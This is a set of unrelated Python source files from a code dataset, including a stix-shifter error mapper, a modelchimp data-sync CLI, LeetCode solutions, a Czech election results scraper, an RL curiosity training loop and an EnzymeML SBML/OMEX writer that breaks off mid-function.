            # (workflow name + view function name) — confirm it matches.
            return redirect(url_for('delete_alias_record_exampledelete_alias_record_example_delete_alias_record_example_page'))
        except Exception as e:
            flash(util.safe_str(e))
            g.user.logger.warning('%s' % util.safe_str(e), msg_type=g.user.logger.EXCEPTION)
            return render_template('delete_alias_record_example_page.html',
                                   form=form,
                                   text=util.get_text(module_path(), config.language),
                                   options=g.user.get_options())
    else:
        g.user.logger.info('Form data was not valid.')
        return render_template('delete_alias_record_example_page.html',
                               form=form,
                               text=util.get_text(module_path(), config.language),
                               options=g.user.get_options())
| StarcoderdataPython |
12802834 | from stix_shifter_utils.utils.error_mapper_base import ErrorMapperBase
from stix_shifter_utils.utils.error_response import ErrorCode
from stix_shifter_utils.utils import logger
# Maps numeric error codes returned by the data-source API onto
# stix-shifter transmission ErrorCode values.
# NOTE(review): entries 1004 and 1020 store the enum's `.value` while the
# other entries store the ErrorCode member itself — confirm this mix is
# intentional before relying on comparisons against the mapped values.
error_mapping = {
    # These are only examples. Change the keys to reflect the error codes that come back from the data source API.
    # search does not exist
    1002: ErrorCode.TRANSMISSION_SEARCH_DOES_NOT_EXISTS,
    # The search cannot be created. The requested search ID that was provided in the query expression is already in use.
    # Please use a unique search ID (or allow one to be generated).
    1004: ErrorCode.TRANSMISSION_MODULE_DEFAULT_ERROR.value,
    # A request parameter is not valid
    1005: ErrorCode.TRANSMISSION_INVALID_PARAMETER,
    # The server might be temporarily unavailable or offline. Please try again later.
    1010: ErrorCode.TRANSMISSION_REMOTE_SYSTEM_IS_UNAVAILABLE,
    # An error occurred during the attempt
    1020: ErrorCode.TRANSMISSION_MODULE_DEFAULT_ERROR.value,
    # error in query
    2000: ErrorCode.TRANSMISSION_QUERY_PARSING_ERROR,
    400: ErrorCode.TRANSMISSION_QUERY_PARSING_ERROR,
    403: ErrorCode. TRANSMISSION_FORBIDDEN,
    401: ErrorCode.TRANSMISSION_AUTH_CREDENTIALS
}
class ErrorMapper():
    """Translates raw data-source error payloads into stix-shifter codes."""

    logger = logger.set_logger(__name__)
    DEFAULT_ERROR = ErrorCode.TRANSMISSION_MODULE_DEFAULT_ERROR

    @staticmethod
    def set_error_code(json_data, return_obj):
        """Attach the ErrorCode mapped from json_data['code'] to *return_obj*.

        Falls back to DEFAULT_ERROR (and logs the payload) when the code
        is missing, non-numeric, or unknown.
        """
        try:
            source_code = int(json_data['code'])
        except Exception:
            source_code = None

        mapped = error_mapping.get(source_code, ErrorMapper.DEFAULT_ERROR)
        if mapped == ErrorMapper.DEFAULT_ERROR:
            ErrorMapper.logger.error("failed to map: " + str(json_data))

        ErrorMapperBase.set_error_code(return_obj, mapped)
| StarcoderdataPython |
4992669 | import click
import os
import ntpath
#Temp, delete this
import sys
import tempfile
from shutil import make_archive, rmtree, unpack_archive, copy
sys.path.insert(0, '.')
from modelchimp.connection_thread import RestConnection
from modelchimp.utils import generate_uid
from modelchimp.log import get_logger
logger = get_logger(__name__)
@click.group()
def cli():
    """Root click command group for the modelchimp CLI."""
    pass
@cli.command()
@click.option('--host', '-h', default='localhost:8000')
@click.option('--project-key', '-k')
@click.argument('path')
def sync(host, project_key, path):
    """Zip the file/folder at *path* and upload it as a new data version."""
    if not project_key:
        # NOTE(review): click.BadParameter's `param` kwarg expects a
        # click.Parameter object, not the raw value — confirm usage.
        raise click.BadParameter("--project-key is required", param=project_key)

    # Current working directory
    cwd = os.getcwd()
    full_path = os.path.join(cwd, path)
    data, file_locations = create_temp_file(full_path)

    # Connection addresses
    rest_address = "%s/" %(host,)

    version_id = generate_uid()
    rest = RestConnection(rest_address, project_key, version_id)
    rest.create_data_version(version_id, data, file_locations)
@cli.command()
@click.option('--host', '-h', default='localhost:8000')
@click.option('--project-key', '-k')
@click.argument('id')
def pull_data(host, project_key, id):
    """Download the data-version archive *id* and unpack it into ./data."""
    if not project_key:
        # NOTE(review): click.BadParameter's `param` kwarg expects a
        # click.Parameter object, not the raw value — confirm usage.
        raise click.BadParameter("--project-key is required", param=project_key)

    # Connection addresses
    rest_address = "%s/" %(host,)
    rest = RestConnection(rest_address, project_key, id)

    url = 'api/retrieve-data-version/%s/?data-version=%s' % (rest.project_id, id)
    logger.info("Downloading data with the id: %s" % id)
    request = rest.get(url)

    if request.status_code == 400:
        logger.info("Unable to download data. Is it a valid id?")
        # Bug fix: previously fell through, wrote the error payload to
        # data.zip, and then crashed trying to unpack it. Stop here.
        return

    data_object = request.content
    with open('data.zip', 'wb') as f:
        f.write(data_object)

    unpack_archive('data.zip', 'data')
    os.remove('data.zip')
def create_temp_file(path):
    """Zip *path* (a file or a directory) via a temporary directory.

    Returns a tuple ``(archive_bytes, file_locations)`` where
    ``file_locations`` lists every file included in the archive, or
    ``None`` when *path* is neither a file nor a directory.
    """
    file_locations = []

    if os.path.isfile(path):
        file_locations.append(path)
        archive_bytes = _compress_file(path)
    elif os.path.isdir(path):
        # Bug fix: the original reused `path` as the os.walk loop variable,
        # clobbering the argument, so _compress_folder archived the LAST
        # walked subdirectory instead of the requested root.
        for dirpath, _subdirs, filenames in os.walk(path):
            for name in filenames:
                file_locations.append(os.path.join(dirpath, name))
        archive_bytes = _compress_folder(path)
    else:
        print("Oops, path is neither a file nor a folder")
        return

    return archive_bytes, file_locations


def _compress_file(path):
    """Return zip-archive bytes containing the single file at *path*."""
    tmpdir = tempfile.mkdtemp()
    try:
        tmpdata = os.path.join(tmpdir, 'data')
        os.mkdir(tmpdata)
        copy(path, tmpdata)

        tmparchive = os.path.join(tmpdir, 'arhive')
        # Close the archive handle explicitly (the original leaked it).
        with open(make_archive(tmparchive, 'zip', tmpdata), 'rb') as fh:
            data = fh.read()
    finally:
        rmtree(tmpdir)

    return data


def _compress_folder(path):
    """Return zip-archive bytes of the whole directory tree at *path*."""
    tmpdir = tempfile.mkdtemp()
    try:
        tmparchive = os.path.join(tmpdir, 'data')
        with open(make_archive(tmparchive, 'zip', path), 'rb') as fh:
            data = fh.read()
    finally:
        rmtree(tmpdir)

    return data
if __name__ == "__main__":
cli()
| StarcoderdataPython |
1631992 | <reponame>subramp-prep/leetcode<gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: illuz <<EMAIL>[at]gmail.com>
# File: AC_hash_two_sum_n2logn.py
# Create Date: 2015-03-04 17:54:25
# Usage: AC_hash_two_sum_n2logn.py
# Descripton:
import collections
import itertools
class Solution:
    # @return a list of lists of length 4, [[val1,val2,val3,val4]]
    def fourSum(self, num, target):
        """Return all unique quadruplets in *num* summing to *target*.

        Buckets every index pair by its value sum, then joins each bucket
        with its complementary bucket, keeping only index-disjoint pairs.
        """
        two_sum = collections.defaultdict(list)
        ret = set()
        # Bucket every index pair by its value sum.
        for (id1, val1), (id2, val2) in itertools.combinations(enumerate(num), 2):
            two_sum[val1 + val2].append({id1, id2})
        # Bug fix: snapshot the keys — the loop deletes entries while
        # iterating, which raises RuntimeError on a live Python 3 dict view.
        keys = list(two_sum.keys())
        for key in keys:
            if two_sum[key] and two_sum[target - key]:
                for pair1 in two_sum[key]:
                    for pair2 in two_sum[target - key]:
                        # Only combine pairs that share no index.
                        if pair1.isdisjoint(pair2):
                            ret.add(tuple(sorted([num[i] for i in pair1 | pair2])))
                # Both buckets are fully processed; drop them.
                del two_sum[key]
                if key != target - key:
                    del two_sum[target - key]
        return [list(i) for i in ret]
# debug
# Smoke test (Python 2 print syntax); expected output: [[-1, 0, 1, 2]]
s = Solution()
print s.fourSum([2,1,0,-1], 2)
| StarcoderdataPython |
6631502 | <gh_stars>1-10
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def preorderTraversal(self, root: TreeNode) -> List[int]:
        """Return the preorder (root, left, right) traversal of the tree.

        Iterative two-deque scheme: ``lefts`` holds nodes still being
        descended along their left spine, ``rights`` holds deferred right
        children; draining ``lefts`` first yields preorder.

        NOTE(review): ``TreeNode``, ``List`` and ``deque`` are assumed to
        be injected by the judge harness — add imports if used standalone.
        """
        # Bug fix: the original also tested `not root.val`, so a valid
        # root holding the falsy value 0 incorrectly returned [].
        if not root:
            return []
        lefts, rights = deque(), deque()
        lefts.append(root)
        ans = []
        while lefts or rights:
            # Prefer the left-descent queue; fall back to deferred rights.
            # (The original duplicated this identical body in two branches.)
            cur = lefts.popleft() if lefts else rights.popleft()
            if cur:
                ans.append(cur.val)
                if cur.left:
                    lefts.appendleft(cur.left)
                if cur.right:
                    rights.appendleft(cur.right)
        return ans
| StarcoderdataPython |
3350812 | <reponame>oboforty/eme<gh_stars>1-10
import os
import sys
from eme.entities import load_handlers, load_settings
from eme.website import WebsiteBlueprint
from .services import auth
# Resolve this package's directory, load its config.ini, and make the
# package importable by absolute path.
module_path = os.path.dirname(os.path.realpath(__file__))
conf = load_settings(os.path.join(module_path, 'config.ini'))
sys.path.append(module_path)

# Populated by init_webapp(); holds this module's website blueprint.
blueprint = None
def init_webapp(webapp, webconf):
    """Wire the auth service and the 'doors' blueprint into *webapp*.

    NOTE: *webconf* is currently unused; the module-level `conf` is used.
    """
    # TODO: ITT: test with eme first?
    auth.init(webapp, conf['auth'])

    global blueprint
    blueprint = WebsiteBlueprint('doors', conf, module_path, module_route="/users")
def init_cliapp(app, conf):
    """Register this module's CLI command handlers on *app*."""
    # Note: the `conf` parameter shadows the module-level conf and is unused.
    app.commands.update(load_handlers(app, 'Command', path=os.path.join(module_path, 'commands')))
def init_wsapp(app, conf):
    """Placeholder: websocket-app initialization hook (no-op)."""
    pass
def init_dal():
    """Placeholder: data-access-layer initialization hook (no-op)."""
    pass
def init_migration():
    """Import ORM models so migration tooling can discover their tables."""
    from .dal.user import User
| StarcoderdataPython |
1796767 | <filename>data.py
from multiprocessing.pool import ThreadPool
import pandas as pd
import requests
import xmltodict
from helper import *
class Data:
    """Downloads and queries Czech 2017 election results from volby.cz.

    Results for every NUTS unit are fetched as XML, flattened into
    per-city/per-party rows, and held in a single pandas DataFrame.
    """

    def __init__(self):
        # Accumulated election rows; rebuilt from scratch by update().
        self.df = pd.DataFrame(data={})
        # https://volby.cz/pls/ps2017nss/vysledky_okres?nuts=CZ0806
        # Download progress counters (used by get_progress()).
        self.downloaded = 0
        self.to_download = len(NUTS)
        return

    # another approach would be having an index of what cities/towns are in NUTS and then
    # download only needed data.
    def update(self):
        """
        Overwrite existing data with new ones downloaded from volby.cz by __fetch_data().
        Data is downloaded for all NUTS units separately due to the limitation on server site.
        :return:
        """
        # It there was a change, then without a diff it is cheaper (and much faster) to delete everything
        # and extract again.
        # possible improvements: Keep hashes of already downloaded files.
        # If newly downloaded file has the same hash, I don't need to extract it
        self.df.drop(self.df.index, inplace=True)
        self.df = pd.DataFrame(data={})

        # Multithreading helps a lot here.
        # ~ 2.717305s - with multithreading
        # ~ 18.856571s - without multithreading
        # still very slow though
        # print("Downloading data...")
        pool = ThreadPool(processes=32)
        multiple_results = [pool.apply_async(
            Data.__fetch_data, (self, nuts)) for nuts in NUTS]
        # Results are folded into the DataFrame on the main thread only
        # (appending from worker threads caused data loss — see below).
        [self.__add_to_dataframe(res.get(timeout=10)) for res in multiple_results]
        #print("\n{} entries imported".format(len(self.df)))

    def get_progress(self):
        """Return a human-readable 'downloaded / total' progress string."""
        return "{} / {} downloaded".format(self.downloaded, self.to_download)

    def __add_to_dataframe(self, x):
        """
        :param x: Array of dictionaries with following keys: 'district_name', 'city_id', 'city_name', 'party',
        'party_votes_percent', total_votes' [optional]
        :return: Updates self.df pandas dataframe
        """
        # print("#", end="")
        self.downloaded += 1
        # NOTE(review): DataFrame.append is deprecated in modern pandas;
        # consider pd.concat if the dependency is upgraded.
        self.df = self.df.append(x)

    def __fetch_data(self, nuts):
        """
        Download elections data from volby.cz based on selected NUTS (something between region and district) and extract
        usedful data
        :param nuts: something between region and district, e.g. "CZ0412", see nuts_dial.txt
        :return: array[Dict of extracted data]
        """
        url = "https://volby.cz/pls/ps2017nss/vysledky_okres?nuts={}".format(
            nuts)
        r = requests.get(url, allow_redirects=True)
        # Retry (busy-loop) until the server answers 200.
        while r.status_code != 200:
            r = requests.get(url, allow_redirects=True)
            print('Retrying {}!'.format(nuts))
        # Persist the XML temporarily; it is parsed and removed below.
        filename = '{}.xml'.format(nuts)
        open(filename, 'wb').write(r.content)
        tmp_data = []  # performing concat once finished is cheaper that an append in foreach
        with open(filename) as xml_file:
            data_dict = xmltodict.parse(xml_file.read())
            res = data_dict.get("VYSLEDKY_OKRES")
            district = res.get("OKRES")
            cities = res.get("OBEC")
            # One output row per (city, party) pair.
            for city in cities:
                votes = city.get("HLASY_STRANA")
                for party in votes:
                    tmp_data.append(
                        {
                            'district_name': district["@NAZ_OKRES"],
                            'city_id': city["@CIS_OBEC"],
                            'city_name': city["@NAZ_OBEC"],
                            'party': party["@KSTRANA"],
                            'party_votes_percent': party["@PROC_HLASU"],
                            'total_votes': city["UCAST"]["@PLATNE_HLASY"]
                        }
                    )
        os.remove(filename)
        # need to add data to pandas in the main thread, otherwise it causes data loss
        return tmp_data

    def find_places_by_name(self, qu):
        """
        Find places by name from pandas dataframe
        :param qu: Name of place, e.g. "<NAME>" (case sensitive, uses diacritics)
        :return: Array of results containing "city_id", "city_name", "district_name" if found, otherwise empty dataframe
        """
        # qu = "<NAME>"
        # todo: make it case insensitive
        res = self.df.loc[self.df['city_name'].str.startswith(qu)]
        # res = self.df.loc[str.lower(self.df['city_name'].str).contains(qu, case=False)]
        options = res[["city_id", "city_name",
                       "district_name"]].drop_duplicates()
        return options

    def get_votes_by_city_id(self, city_id):
        """Return all rows (one per party) for the city with *city_id*."""
        return self.df.loc[self.df['city_id'] == str(city_id)]
| StarcoderdataPython |
4902850 | import numpy as np
import matplotlib as plt
import gym
import IntrinsicRewardModel
from environment import Environment
from utils import HyperParameters, one_hot_encode_action
BENCHMARK_ENVIRONMENT = 'CartPole-v0'
def batch_train():
    """Train the intrinsic-reward model on the benchmark env in mini-batches.

    Bug fix: the original decorated this MODULE-LEVEL function with
    @staticmethod, which makes it non-callable on Python < 3.10.

    NOTE(review): `IntrinsicRewardModel` is imported as a module at the top
    of the file but called like a class below — confirm the intended
    attribute (e.g. IntrinsicRewardModel.IntrinsicRewardModel).
    """
    # track results
    states = []
    actions = []
    ext_rewards = []
    game_best_position = -.4
    current_position = np.ndarray([0, 2])

    params = HyperParameters()
    env = Environment(gym.make(BENCHMARK_ENVIRONMENT))
    model = IntrinsicRewardModel(env, params)
    batch_size = params.batch_size

    positions = np.zeros((params.iterations.training_games, 2))  # record actions
    rewards = np.zeros(params.iterations.training_games)  # record rewards

    for game_index in range(params.iterations.training_games):
        state = env.reset()  # each game is a new env
        game_reward = 0
        running_reward = 0

        for step_index in range(params.iterations.game_steps):
            # act: sample randomly until one full batch of experience exists
            if step_index > batch_size:
                action = model.act(state)
            else:
                action = model.env.action_space.sample()

            step = env.step(action)
            action = one_hot_encode_action(action, env.action_shape())

            # reward: curiosity signal from the model plus extrinsic reward
            int_r_state = np.reshape(step.state, (1, 2))
            int_r_next_state = np.reshape(step.next_state, (1, 2))
            int_r_action = np.reshape(action, (1, 3))
            intrinsic_reward = model.get_intrinsic_reward([np.array(int_r_state), np.array(int_r_next_state),
                                                           np.array(int_r_action)])

            # calc total reward
            reward = intrinsic_reward + step.ext_reward
            game_reward += reward

            # Bonus when a new furthest position is reached this game.
            if step.state[0] > game_best_position:
                game_best_position = step.state[0]
                positions = np.append(current_position, [[game_index, game_best_position]], axis=0)
                running_reward += 10
            else:
                running_reward += reward

            # move state
            state = step.next_state

            # batch train: replay the last batch_size transitions
            states.append(step.next_state)
            ext_rewards.append(step.ext_reward)
            actions.append(step.action)
            if step_index % batch_size == 0 and step_index >= batch_size:
                all_states = states[-(batch_size + 1):]
                model.learn(prev_states=all_states[:batch_size],
                            states=all_states[batch_size:],
                            actions=actions[batch_size:],
                            rewards=ext_rewards[batch_size:])
            if step.done:
                break

        rewards[game_index] = game_reward
        positions[-1][0] = game_index
        positions[game_index] = positions[-1]

    _show_training_data(positions, rewards)
def _show_training_data(positions, rewards):
    """Plot furthest position per episode (top) and episode reward (bottom).

    Bug fix: dropped the module-level @staticmethod decorator — it made the
    function non-callable on Python < 3.10 where batch_train invokes it.

    NOTE(review): the file imports `matplotlib as plt`; the calls below need
    `matplotlib.pyplot` — confirm/fix the top-of-file import.
    """
    positions[0] = [0, -0.4]
    plt.figure(1, figsize=[10, 5])
    plt.subplot(211)
    plt.plot(positions[:, 0], positions[:, 1])
    plt.xlabel('Episode')
    plt.ylabel('Furthest Position')
    plt.subplot(212)
    plt.plot(rewards)
    plt.xlabel('Episode')
    plt.ylabel('Reward')
    plt.show()
| StarcoderdataPython |
3546335 | __title__ = "lavarand"
__description__ = "Randomness 101: LavaRand in Production"
__url__ = "https://csprng.xyz/"
__version__ = "1.1.1.5"
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 2.0"
__copyright__ = "Copyright (C) 2018-Present <NAME>"
| StarcoderdataPython |
3559956 | '''
Created on 03.07.2020
@author: JR
'''
from libsbml import SBMLDocument, CVTerm, XMLNode, XMLTriple, XMLAttributes,\
XMLNamespaces, SBMLWriter
import libsbml
from libsbml._libsbml import BIOLOGICAL_QUALIFIER, BQB_IS
from libcombine import CombineArchive, OmexDescription, KnownFormats, VCard
import pandas as pd
import numpy as np
import os
class EnzymeMLWriter(object):
def toFile(self, enzmldoc, path):
'''
Writes EnzymeMLDocument object to an .omex container
Args:
EnzymeMLDocument enzmldoc: Previously created instance of an EnzymeML document
String path: EnzymeML file is written to this destination
'''
self.path = path + '/' + enzmldoc.getName()
try:
os.makedirs( self.path + '/data' )
except FileExistsError:
pass
doc = SBMLDocument()
doc.setLevelAndVersion(enzmldoc.getLevel(), enzmldoc.getVersion())
model = doc.createModel()
model.setName(enzmldoc.getName())
model.setId(enzmldoc.getName())
# Add references
self.__addRefs(model, enzmldoc)
# Add units
self.__addUnits(model, enzmldoc)
# Add Vessel
self.__addVessel(model, enzmldoc)
# Add protein
self.__addProteins(model, enzmldoc)
# Add reactants
self.__addReactants(model, enzmldoc)
# Add reactions
self.__addReactions(model, enzmldoc)
# Write to EnzymeML
writer = SBMLWriter()
writer.writeSBMLToFile(doc, self.path + '/experiment.xml')
# Write to OMEX
self.__createArchive(enzmldoc, doc)
os.remove(self.path + '/experiment.xml')
os.remove(self.path + '/data/data.csv')
os.rmdir(self.path + '/data')
def toXMLString(self, enzmldoc):
'''
Converts EnzymeMLDocument to XML string.
Args:
EnzymeMLDocument enzmldoc: Previously created instance of an EnzymeML document
'''
doc = SBMLDocument()
doc.setLevelAndVersion(enzmldoc.getLevel(), enzmldoc.getVersion())
model = doc.createModel()
model.setName(enzmldoc.getName())
model.setId(enzmldoc.getName())
# Add references
self.__addRefs(model, enzmldoc)
# Add units
self.__addUnits(model, enzmldoc)
# Add Vessel
self.__addVessel(model, enzmldoc)
# Add protein
self.__addProteins(model, enzmldoc)
# Add reactants
self.__addReactants(model, enzmldoc)
# Add reactions
self.__addReactions(model, enzmldoc, csv=False)
# Write to EnzymeML
writer = SBMLWriter()
return writer.writeToString(doc)
def toSBML(self, enzmldoc):
'''
Returns libSBML model.
Args:
EnzymeMLDocument enzmldoc: Previously created instance of an EnzymeML document
'''
doc = SBMLDocument()
doc.setLevelAndVersion(enzmldoc.getLevel(), enzmldoc.getVersion())
model = doc.createModel()
model.setName(enzmldoc.getName())
model.setId(enzmldoc.getName())
# Add references
self.__addRefs(model, enzmldoc)
# Add units
self.__addUnits(model, enzmldoc)
# Add Vessel
self.__addVessel(model, enzmldoc)
# Add protein
self.__addProteins(model, enzmldoc)
# Add reactants
self.__addReactants(model, enzmldoc)
# Add reactions
self.__addReactions(model, enzmldoc, csv=False)
return doc
    def __createArchive(self, enzmldoc, doc):
        """Bundle experiment.xml and data/data.csv into an .omex archive.

        Writes '<name>.omex' under self.path, attaching OMEX metadata
        (creation date, creators) to the archive and both files.
        """
        archive = CombineArchive()
        archive.addFile(
            self.path + '/experiment.xml', # filename
            "./experiment.xml", # target file name
            KnownFormats.lookupFormat("sbml"), # look up identifier for SBML models
            True # mark file as master
        )
        archive.addFile(
            self.path + '/data/data.csv', # filename
            "./data/data.csv", # target file name
            KnownFormats.lookupFormat("csv"), # look up identifier for SBML models
            False # mark file as master
        )

        # add metadata to the archive itself
        description = OmexDescription()
        description.setAbout(".")
        description.setDescription(enzmldoc.getName())
        description.setCreated(OmexDescription.getCurrentDateAndTime())

        # Creators are optional — older documents may lack get_creator().
        try:
            for creat in enzmldoc.get_creator():
                creator = VCard()
                creator.setFamilyName(creat.getFname())
                creator.setGivenName(creat.getGname())
                creator.setEmail(creat.getMail())
                description.addCreator(creator)
        except AttributeError:
            pass

        archive.addMetadata(".", description)

        # add metadata to the experiment file
        location = "./experiment.xml"
        description = OmexDescription()
        description.setAbout(location)
        description.setDescription("EnzymeML model")
        description.setCreated(OmexDescription.getCurrentDateAndTime())
        archive.addMetadata(location, description)

        # add metadata to the csv file
        location = "./data/data.csv"
        description = OmexDescription()
        description.setAbout(location)
        description.setDescription("EnzymeML Time Course Data")
        description.setCreated(OmexDescription.getCurrentDateAndTime())
        archive.addMetadata(location, description)

        # write the archive (remove any stale copy first)
        out_file = "%s.omex" % enzmldoc.getName().replace(' ', '_')
        try:
            os.remove(self.path + '/' + out_file)
        except FileNotFoundError:
            pass
        archive.writeToFile(self.path + '/' + out_file)

        print('\nArchive created:', out_file)
    def __addRefs(self, model, enzmldoc):
        """Append an <enzymeml:references> annotation (DOI, PubMed ID, URL).

        Each reference field is optional; missing getters raise
        AttributeError and are simply skipped. The annotation is only
        attached when at least one field was present.
        """
        annot_bool = False
        ref_annot = XMLNode( XMLTriple("enzymeml:references"), XMLAttributes(), XMLNamespaces() )
        ref_annot.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")

        try:
            doi = XMLNode( enzmldoc.getDoi() )
            doi_node = XMLNode( XMLTriple("enzymeml:doi"), XMLAttributes(), XMLNamespaces() )
            doi_node.addChild( doi )
            ref_annot.addChild(doi_node)
            annot_bool = True
        except AttributeError:
            pass

        try:
            pubmedid = XMLNode( enzmldoc.getPubmedID() )
            pubmed_node = XMLNode( XMLTriple("enzymeml:pubmedID"), XMLAttributes(), XMLNamespaces() )
            pubmed_node.addChild( pubmedid )
            ref_annot.addChild(pubmed_node)
            annot_bool = True
        except AttributeError:
            pass

        try:
            url = XMLNode( enzmldoc.getUrl() )
            url_node = XMLNode( XMLTriple("enzymeml:url"), XMLAttributes(), XMLNamespaces() )
            url_node.addChild( url )
            ref_annot.addChild(url_node)
            annot_bool = True
        except AttributeError:
            pass

        if annot_bool:
            model.appendAnnotation(ref_annot)
    def __addUnits(self, model, enzmldoc):
        """Create an SBML UnitDefinition (with CV term and base units)
        for every entry in the document's unit dictionary."""
        for key, unitdef in enzmldoc.getUnitDict().items():
            unit = model.createUnitDefinition()
            unit.setId(key)
            unit.setMetaId(unitdef.getMetaid())
            unit.setName(unitdef.getName())

            # Annotate the definition with its ontology resource (BQB_IS).
            cvterm = CVTerm()
            cvterm.addResource(unitdef.getOntology())
            cvterm.setQualifierType(BIOLOGICAL_QUALIFIER)
            cvterm.setBiologicalQualifierType(BQB_IS)
            unit.addCVTerm(cvterm)

            # baseunit tuple layout: (kind, exponent, scale, multiplier)
            for baseunit in unitdef.getUnits():
                u = unit.createUnit()
                try:
                    # Kind may be given as a name string...
                    u.setKind( libsbml.UnitKind_forName(baseunit[0]) )
                except TypeError:
                    # ...or already as a libsbml kind constant.
                    u.setKind( baseunit[0] )
                u.setExponent( baseunit[1] )
                u.setScale( baseunit[2] )
                u.setMultiplier( baseunit[3] )
def __addVessel(self, model, enzmldoc):
vessel = enzmldoc.getVessel()
compartment = model.createCompartment()
compartment.setId(vessel.getId())
compartment.setName(vessel.getName())
compartment.setUnits(vessel.getUnit())
compartment.setSize(vessel.getSize())
compartment.setConstant(vessel.getConstant())
compartment.setSpatialDimensions(3)
    def __addProteins(self, model, enzmldoc):
        """Create an SBML species per protein, annotated with sequence and
        (when available) EC number, UniProt ID and organism."""
        for key, protein in enzmldoc.getProteinDict().items():
            species = model.createSpecies()
            species.setId(key)
            species.setName(protein.getName())
            species.setMetaId(protein.getMetaid())
            species.setSBOTerm(protein.getSboterm())
            species.setCompartment(protein.getCompartment())
            species.setBoundaryCondition(protein.getBoundary());
            species.setInitialConcentration(protein.getInitConc());
            species.setSubstanceUnits(protein.getSubstanceUnits());
            species.setConstant(protein.getConstant())
            species.setHasOnlySubstanceUnits(False)

            # add annotation: <enzymeml:protein> with the mandatory sequence
            annot_root = XMLNode( XMLTriple('enzymeml:protein'), XMLAttributes(), XMLNamespaces() )
            annot_root.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")

            annot_sequence = XMLNode( XMLTriple('enzymeml:sequence'), XMLAttributes(), XMLNamespaces() )
            sequence = XMLNode(protein.getSequence())
            annot_sequence.addChild(sequence)
            annot_root.addChild(annot_sequence)

            # Optional fields: missing getters raise AttributeError and the
            # corresponding child element is simply omitted.
            try:
                annot_ec = XMLNode( XMLTriple('enzymeml:ECnumber'), XMLAttributes(), XMLNamespaces() )
                ecnumber = XMLNode(protein.getEcnumber())
                annot_ec.addChild(ecnumber)
                annot_root.addChild(annot_ec)
            except AttributeError:
                pass

            try:
                annot_uniprot = XMLNode( XMLTriple('enzymeml:uniprotID'), XMLAttributes(), XMLNamespaces() )
                uniprotid = XMLNode(protein.getUniprotID())
                annot_uniprot.addChild(uniprotid)
                annot_root.addChild(annot_uniprot)
            except AttributeError:
                pass

            try:
                annot_org = XMLNode( XMLTriple('enzymeml:organism'), XMLAttributes(), XMLNamespaces() )
                organism = XMLNode(protein.getOrganism())
                annot_org.addChild(organism)
                annot_root.addChild(annot_org)
            except AttributeError:
                pass

            species.appendAnnotation(annot_root)
    def __addReactants(self, model, enzmldoc):
        """Create an SBML species per reactant, annotated with InChI and
        SMILES strings when present on the reactant object."""
        for key, reactant in enzmldoc.getReactantDict().items():
            species = model.createSpecies()
            species.setId(key)
            species.setName(reactant.getName())
            species.setMetaId(reactant.getMetaid())
            species.setSBOTerm(reactant.getSboterm())
            species.setCompartment(reactant.getCompartment())
            species.setBoundaryCondition(reactant.getBoundary());
            # Concentration/units are only set when meaningful values exist.
            if reactant.getInitConc() > 0: species.setInitialConcentration(reactant.getInitConc());
            if reactant.getSubstanceunits() != 'NAN': species.setSubstanceUnits(reactant.getSubstanceunits());
            species.setConstant(reactant.getConstant())
            species.setHasOnlySubstanceUnits(False)

            # Controls if annotation will be added
            # NOTE(review): reactant_annot and inchi_annot are initially
            # bound to the SAME node here; inchi_annot is rebound below —
            # confirm the double assignment is intentional.
            reactant_annot = inchi_annot = XMLNode( XMLTriple('enzymeml:reactant'), XMLAttributes(), XMLNamespaces() )
            reactant_annot.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")

            # Optional structure descriptors: missing getters raise
            # AttributeError and are skipped.
            try:
                append_bool = True
                inchi_annot = XMLNode( XMLTriple('enzymeml:inchi'), XMLAttributes(), XMLNamespaces() )
                inchi_annot.addAttr('inchi', reactant.getInchi())
                reactant_annot.addChild(inchi_annot)
            except AttributeError:
                pass

            try:
                append_bool = True
                smiles_annot = XMLNode( XMLTriple('enzymeml:smiles'), XMLAttributes(), XMLNamespaces() )
                smiles_annot.addAttr('smiles', reactant.getSmiles())
                reactant_annot.addChild(smiles_annot)
            except AttributeError:
                pass

            if append_bool == True: species.appendAnnotation(reactant_annot)
def __addReactions(self, model, enzmldoc, csv=True):
# initialize format annotation
data_root = XMLNode( XMLTriple('enzymeml:data'), XMLAttributes(), XMLNamespaces() )
data_root.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
list_formats = XMLNode( XMLTriple('enzymeml:listOfFormats'), XMLAttributes(), XMLNamespaces() )
format_ = XMLNode( XMLTriple('enzymeml:format'), XMLAttributes(), XMLNamespaces() )
format_.addAttr( 'id', 'format0' )
# initialize csv data collection
data = []
# initialize time
index = 0
if len(list(enzmldoc.getReactionDict().items())) == 0:
raise ValueError( "Please define a reaction before writing" )
for key, reac in enzmldoc.getReactionDict().items():
reaction = model.createReaction()
reaction.setName(reac.getName())
reaction.setId(key)
reaction.setMetaId(reac.getMetaid())
reaction.setReversible(reac.getReversible())
# initialize conditions annotations
annot_root = XMLNode( XMLTriple('enzymeml:reaction'), XMLAttributes(), XMLNamespaces() )
annot_root.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
conditions_root = XMLNode( XMLTriple('enzymeml:conditions'), XMLAttributes(), XMLNamespaces() )
temp_node = XMLNode( XMLTriple('enzymeml:temperature'), XMLAttributes(), XMLNamespaces() )
temp_node.addAttr('value', str(reac.getTemperature()) )
temp_node.addAttr('unit', reac.getTempunit())
ph_node = XMLNode( XMLTriple('enzymeml:ph'), XMLAttributes(), XMLNamespaces() )
ph_node.addAttr('value', str(reac.getPh()) )
conditions_root.addChild(temp_node)
conditions_root.addChild(ph_node)
annot_root.addChild(conditions_root)
all_elems = reac.getEducts() + reac.getProducts()
all_repls = [ repl for tup in all_elems for repl in tup[3] ]
if len( all_repls ) > 0:
# initialize replica/format annotations
replica_root = XMLNode( XMLTriple('enzymeml:replicas'), XMLAttributes(), XMLNamespaces() )
replicate = all_repls[0]
time = replicate.getData().index.tolist()
time_unit = replicate.getTimeUnit()
time_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
time_node.addAttr('type', 'time')
time_node.addAttr('unit', time_unit)
time_node.addAttr('index', str(index) )
format_.addChild(time_node)
data.append( time )
index += 1
# iterate over lists
# educts
for educt in reac.getEducts():
